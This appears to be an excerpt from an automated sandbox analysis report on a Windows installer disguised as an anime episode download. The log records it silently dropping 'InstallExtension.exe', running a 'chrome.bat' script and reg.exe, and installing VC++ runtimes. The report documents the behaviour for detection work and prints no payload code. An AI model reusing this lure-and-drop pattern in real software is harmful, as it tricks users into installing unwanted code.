Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000B44E9 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,5_2_000B44E9
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\Programs
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp
Source: classification engineClassification label: sus26.winEXE@73/269@12/0
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00052F23 GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,4_2_00052F23
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile read: C:\Users\user\Desktop\desktop.ini
Source: vcRuntimeAdditional_x64.5.dr, 3cd711.msi.15.drBinary or memory string: SELECT `WixDependencyProvider`.`WixDependencyProvider`, `WixDependencyProvider`.`Component_`, `WixDependencyProvider`.`ProviderKey`, `WixDependencyProvider`.`Attributes` FROM `WixDependencyProvider`SELECT `WixDependency`.`WixDependency`, `WixDependencyProvider`.`Component_`, `WixDependency`.`ProviderKey`, `WixDependency`.`MinVersion`, `WixDependency`.`MaxVersion`, `WixDependency`.`Attributes` FROM `WixDependencyProvider`, `WixDependency`, `WixDependencyRef` WHERE `WixDependency`.`WixDependency` = `WixDependencyRef`.`WixDependency_` AND `WixDependencyProvider`.`WixDependencyProvider` = `WixDependencyRef`.`WixDependencyProvider_`WixDependencyRequireFailed to initialize.Failed to initialize the registry functions.ALLUSERSFailed to ensure required dependencies for (re)installing components.WixDependencyCheckFailed to ensure absent dependents for uninstalling components.WixDependencySkipping the dependency check since no dependencies are authored.Failed to check if the WixDependency table exists.Failed to initialize the unique dependency string list.Failed to open the query view for dependencies.Failed to get WixDependency.WixDependency.Failed to get WixDependencyProvider.Component_.Skipping dependency check for %ls because the component %ls is not being (re)installed.Failed to get WixDependency.ProviderKey.Failed to get WixDependency.MinVersion.Failed to get WixDependency.MaxVersion.Failed to get WixDependency.Attributes.Failed dependency check for %ls.Failed to enumerate all of the rows in the dependency query view.Failed to create the dependency record for message %d.Unexpected message response %d from user or bootstrapper application.Failed to get the ignored dependents.ALLFailed to check if "ALL" was set in IGNOREDEPENDENCIES.Skipping the dependencies check since IGNOREDEPENDENCIES contains "ALL".WixDependencyProviderSkipping the dependents check since no dependency providers are 
authored.Failed to check if the WixDependencyProvider table exists.Failed to open the query view for dependency providers.Failed to get WixDependencyProvider.WixDependencyProvider.Failed to get WixDependencyProvider.Component.Skipping dependents check for %ls because the component %ls is not being uninstalled.Failed to get WixDependencyProvider.ProviderKey.Failed to get WixDependencyProvider.Attributes.Failed dependents check for %ls.Failed to enumerate all of the rows in the dependency provider query view.;IGNOREDEPENDENCIESFailed to get the string value of the IGNOREDEPENDENCIES property.Failed to create the string dictionary.Failed to ignored dependency "%ls" to the string dictionary.wixdepca.cppNot enough memory to create the message record.Failed to set the message identifier into the message record.Failed to set the number of dependencies into the message record.The dependency "%ls" is missing or is not the required version.Found dependent "%ls", name: "%ls".Failed to set the dependency key "%ls" into the message record.Failed to set the dependency name "%ls" into
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004FD20 FormatMessageW,GetLastError,LocalFree,4_2_0004FD20
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00036945 ChangeServiceConfigW,GetLastError,4_2_00036945
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Program Files\Installer
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: cabinet.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: msi.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: version.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: wininet.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: comres.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: clbcatq.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: msasn1.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: crypt32.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: feclient.dll4_2_00011070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: cabinet.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: msi.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: version.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: wininet.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: comres.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: clbcatq.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: msasn1.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: crypt32.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: feclient.dll5_2_000B1070
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: VC_redist.x64.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: Boku no Hero Academia 6th Season - Episode 13.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpWindow found: window name: TMainForm
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeWindow detected: Number of UI elements: 23
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeWindow detected: Number of UI elements: 23
Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF4C347D-954E-4543-88D2-EC17F07F466F}
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic file information: File size 25461096 > 1048576
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpDirectory created: C:\Program Files\Installer
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: certificate valid
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: VC_redist.x64.exe, VC_redist.x64.exe.5.dr, VC_redist.x64.exe.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: msvcp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFCM140U.amd64.pdb source: mfcm140u.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: msvcp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcamp140.amd64.pdb source: vcamp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140DEU.amd64.pdb source: mfc140deu.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ENU.amd64.pdb source: mfc140enu.dll.15.dr
Source: Binary string: C:\Users\dsaxc\Desktop\InstallExtension\x64\Release\InstallExtension.pdb source: Boku no Hero Academia 6th Season - Episode 13.tmp, InstallExtension.exe, is-NDGJF.tmp.3.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\concrt140.amd64.pdb source: concrt140.dll.15.dr
Source: Binary string: C:\Users\dsaxc\Desktop\InstallExtension\x64\Release\InstallExtension.pdb%% source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.392947585.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, InstallExtension.exe, 0000001E.00000000.378319985.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 0000001E.00000002.382242447.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000000.382129606.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000002.387277253.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, is-NDGJF.tmp.3.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_atomic_wait.amd64.pdbGCTL source: msvcp140_atomic_wait.dll.15.dr
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\WixStdBA.pdb source: wixstdba.dll.5.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_atomic_wait.amd64.pdb source: msvcp140_atomic_wait.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_2.amd64.pdb source: msvcp140_2.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140JPN.amd64.pdb source: mfc140jpn.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcamp140.amd64.pdbGCTL source: vcamp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_2.amd64.pdbGCTL source: msvcp140_2.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\concrt140.amd64.pdbGCTL source: concrt140.dll.15.dr
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\WixDepCA.pdb source: vcRuntimeAdditional_x64.5.dr, 3cd711.msi.15.dr

Data Obfuscation

Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe"
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E876 push ecx; ret 4_2_0003E889
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DE876 push ecx; ret 5_2_000DE889
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: section name: .didata
Source: Boku no Hero Academia 6th Season - Episode 13.tmp.0.drStatic PE information: section name: .didata
Source: Boku no Hero Academia 6th Season - Episode 13.tmp.2.drStatic PE information: section name: .didata
Source: is-DLQHQ.tmp.3.drStatic PE information: section name: .wixburn
Source: VC_redist.x64.exe.4.drStatic PE information: section name: .wixburn
Source: VC_redist.x64.exe.5.drStatic PE information: section name: .wixburn
Source: VC_redist.x64.exe.7.drStatic PE information: section name: .wixburn
Source: mfc140.dll.15.drStatic PE information: section name: .didat
Source: mfc140u.dll.15.drStatic PE information: section name: .didat
Source: mfcm140.dll.15.drStatic PE information: section name: .nep
Source: mfcm140u.dll.15.drStatic PE information: section name: .nep
Source: vcomp140.dll.15.drStatic PE information: section name: _RDATA
Source: vcruntime140.dll.15.drStatic PE information: section name: _RDATA
Source: mfc140.dll.15.drStatic PE information: 0xFBD5982D [Wed Nov 21 09:09:01 2103 UTC]

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeJump to dropped file
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: \boku no hero academia 6th season - episode 13.exe
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmp
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmp
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71e.rbf (copy)Jump to dropped file
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140jpn.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140ita.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140esn.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd70e.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140deu.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71b.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd708.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd718.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140chs.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfcm140u.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd722.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140enu.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\WindowsApp\is-NDGJF.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\concrt140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140fra.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd70b.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vccorlib140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd707.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71c.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcruntime140_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_atomic_wait.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcomp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71d.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd70d.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140cht.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140rus.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfcm140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140kor.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_2.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140u.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QUMRA.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd724.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71f.rbf (copy)Jump to dropped file
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd70a.rbf (copy)Jump to dropped file
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71a.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd70f.rbf (copy)Jump to dropped file
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeFile created: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd717.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_codecvt_ids.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd723.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcamp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd710.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcruntime140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\is-DLQHQ.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd720.rbf (copy)Jump to dropped file
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_1.dllJump to dropped file
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd721.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd709.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd719.rbf (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe (copy)Jump to dropped file
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1028\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1029\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1031\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1036\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1040\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1041\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1042\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1045\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1046\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1049\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1055\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\2052\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\3082\license.rtfJump to behavior
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1045\license.rtf
